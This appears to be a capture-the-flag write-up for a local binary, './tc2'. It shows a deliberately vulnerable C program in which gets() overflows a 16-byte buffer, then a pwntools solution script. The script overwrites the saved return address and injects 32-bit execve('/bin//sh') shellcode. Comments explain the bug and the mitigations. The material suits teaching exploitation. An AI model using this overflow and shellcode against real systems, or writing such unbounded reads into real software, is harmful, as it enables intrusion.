THANK YOU CHRISTOS
#include <stdio.h>
#include <string.h>
/*
 * Entry point of the challenge binary: prints the prompt, then hands control
 * to vuln_func(), which reads the answer from stdin.
 *
 * NOTE(review): vuln_func() is defined further down and has no prototype
 * before this call, so the call relies on an implicit declaration. Recent
 * compilers may reject that; a forward declaration would make it explicit.
 */
int main()
{
    printf("Do you like jump ROPing?\n");
    vuln_func();
}
/*
 * Reads one line from stdin into a 16-byte stack buffer and prints a fixed
 * reply.
 *
 * This is the challenge's intended bug. gets() takes no length argument, so
 * a line longer than 15 characters is written past the end of buf into the
 * rest of the stack frame; the solution on this page uses that to overwrite
 * the saved return address. gets() was removed from the language in C11 for
 * this reason. The bounded equivalent is fgets(buf, sizeof buf, stdin).
 * Build-time mitigations such as stack protectors, a non-executable stack
 * and PIE raise the cost of this bug class but do not remove it.
 */
void vuln_func()
{
    char buf[16];

    gets(buf); /* unbounded read: no check against sizeof buf */
    printf("I actually don't care about your opinions. Cry about it");
}
/*
 * Prints the flag by running "/bin/cat flag.txt" through the shell.
 *
 * Nothing in this listing calls win(); it only runs if control flow is
 * redirected to it, which is why the overflow in vuln_func() matters.
 *
 * NOTE(review): system() is declared in <stdlib.h>, which this listing does
 * not include (only <stdio.h> and <string.h> are).
 */
void win()
{
    system("/bin/cat flag.txt");
}
Solution
from pwn import *
import struct
# Solution script for the overflow in vuln_func(): the line sent to gets()
# overruns input[16], replaces the saved return address and carries the
# code that then runs.
#
# NOTE(review): this layout depends on a fixed load address and on the stack
# being executable, i.e. presumably a build without PIE and without NX.
# Confirm against the actual ./tc2 binary. With either mitigation enabled
# the same bytes would just crash the process.

# 28 bytes of 32-bit x86 Linux machine code: execve("/bin//sh", NULL, NULL)
# via int 0x80, followed by an exit syscall in case execve returns.
shellcode = b"".join(
    [
        b"\x31\xc0\x50\x68\x2f\x2f\x73",
        b"\x68\x68\x2f\x62\x69\x6e\x89",
        b"\xe3\x89\xc1\x89\xc2\xb0\x0b",
        b"\xcd\x80\x31\xc0\x40\xcd\x80",
    ]
)

# Filler up to the saved return address: the 16-byte buffer plus 12 more
# bytes. The extra 12 are specific to how this binary was compiled and were
# presumably measured in a debugger; the C source alone does not fix them.
padding = b'A'*28

# New return address, little-endian 0x08049807. The page calls it a ROP
# gadget; with the shellcode placed directly behind it, it presumably
# transfers control to the stack (the gadget itself is not shown).
gadget_addr = b'\x07\x98\x04\x08'

# First attempt, kept for reference: 0x080cfa9b. The closing note on this
# page says this gadget sits in .rodata, so the attempt fails.
#payload = b'A'*28 + b'\x9b\xfa\x0c\x08' + shellcode
payload = padding + gadget_addr + shellcode

p = process('./tc2')
#gdb.attach(p)
p.sendline(payload)
p.interactive()
The first payload (the commented-out line) fails because that ROP gadget is in .rodata (read-only data), which is not executable, so returning into it faults.